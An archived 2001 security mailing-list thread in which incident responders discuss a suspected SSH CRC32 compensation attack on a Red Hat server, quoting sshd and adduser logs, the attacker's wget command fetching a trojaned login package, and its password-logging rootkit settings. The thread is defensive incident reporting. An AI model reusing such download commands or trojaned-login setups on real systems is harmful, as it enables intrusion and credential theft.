Re: Attacks against SSH?

From: Aaron Schultz (aaronat_private)
Date: Mon Dec 03 2001 - 11:02:56 PST

  • Next message: f.johan.beisser: "Re: Attacks against SSH?"

    We've disabled the account where the group was storing the login.tgz file.
    The accounts are simply part of free hosting we provide, the box was not
    hacked.  See http://home.dal.net for more info about the setup.
    
    On a similar note, I've noticed scans to port 22 increase recently.
    
    - Aaron Schultz [Wagahai]
    - DALnet Webteam
    
    On Mon, 3 Dec 2001 johan.augustssonat_private wrote:
    
    > 
    > I stumbeled over this post at openssh-unix-dev mailinglist last week -
    > http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=100701808712180&w=2
    > The poster claims that he had OpenSSH-2.9p2-8.7 (latest uppdate for
    > RedHat 7.0) up and running when he received what looks to be a
    > CRC32-attack. A few minutes later you can see (he posted parts of the
    > logfile) a new user being created with uid=0 and then how an connection
    > is made from system in Israel.
    > 
    > There has been no confirmation about what he writes but I recieved the
    > following mail as an answer of my questions.
    > 
    > ------ Message ------
    > I posted an openssh security alert earlier today and already got some
    > responses.
    > Thanks for everything.
    > 
    > Instead of replying to everyone individually I composed the details of
    > the
    > attack.
    > 
    > +++
    > 
    > It does not look like a job of worms.
    > Snort did not detect mass port scan from attacker's ip address. It seems
    > that he (I assumed, so I don't have to type he/she all the way) just
    > wants
    > to gain access through openssh.
    > 
    > The server is running Red Hat 7.0. With all packages up to date. The
    > following daemons are running:  wu-ftpd, apache, telnet, openssh, named
    > I never access the system via telnet, it is there just for backup
    > purpose.
    > 
    > > > Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensation
    > attack:
    > > > network attack detected
    > > > Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on
    > > > input.
    > > > Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on
    > > > input.
    > > > Nov 25 11:37:54 ns sshd[11014]: Disconnecting: Corrupted check bytes on
    > > > input.
    > > > Nov 25 11:40:00 ns CROND[11022]: (root) CMD (   /sbin/rmmod -as)
    > > > Nov 25 11:40:08 ns adduser[11023]: new group: name=mattanl, gid=528
    > > > Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528,
    > gid=528,
    > > > home=/home/mattanl, shell=/bin/bash
    > > > Nov 25 11:40:27 ns adduser[11027]: new group: name=mattan, gid=529
    > > > Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0,
    > gid=529,
    > > > home=/home/mattan, shell=/bin/bash
    > 
    > After the attacker gained root access. He created two users mattan and
    > mattanl.
    > He then downloaded a package: wget
    > http://home.dal.net/resolve/login.tgz.
    > The target site has been compromised. (hacked by a hacker group in
    > Israel)
    > This is a login replacement package, it logs the user id and passwords.
    > He
    > modified rk.h to:
    > #define MY_LOGFILE "/dev/ttypz"
    > #define MY_PASSWORD "1245890"
    > After he complied and installed the login replacement. Something went
    > wrong.
    > /bin/login was zero bytes in length. So when he came back using telnet,
    > he
    > was denied of access. I also disabled sshd and kept one session open for
    > remote control after found login was replaced. I md5 checked the system
    > against a good backup, nothing else was altered.
    > 
    > I will try to sniff all packets come to my this server on ssh port. If
    > he
    > attempts to crack the server again, I will have more details. But I
    > guess I
    > will have to turn the server back on.
    > 
    > Thanks for all you time
    > ------ End of message ------
    > 
    > I had some further questions so I mailed the guy once again but has not
    > recieved any answer.
    > 
    > So, to he main question.
    > Has anyone else had a system compromised by the CRC32-attack when
    > running a version of sshd that is believed to be secure? OpenSSH-2.3.0
    > or later, SSH 1.2.32 or later.
    > 
    > 
    > 
    > /Johan Augustsson
    > 
    > --------------------------------------------------------------------
    > Johan Augustsson                 Phone: +46 (0)31 773 1000
    > Incident Response Team           Fax: +46 (0)31 773 1087
    > Göteborg University              E-mail: Johan.Augustssonat_private
    > Sweden
    > --------------------------------------------------------------------
    > 
    > ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management 
    > and tracking system please see: http://aris.securityfocus.com
    > 
    
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Mon Dec 03 2001 - 12:23:45 PST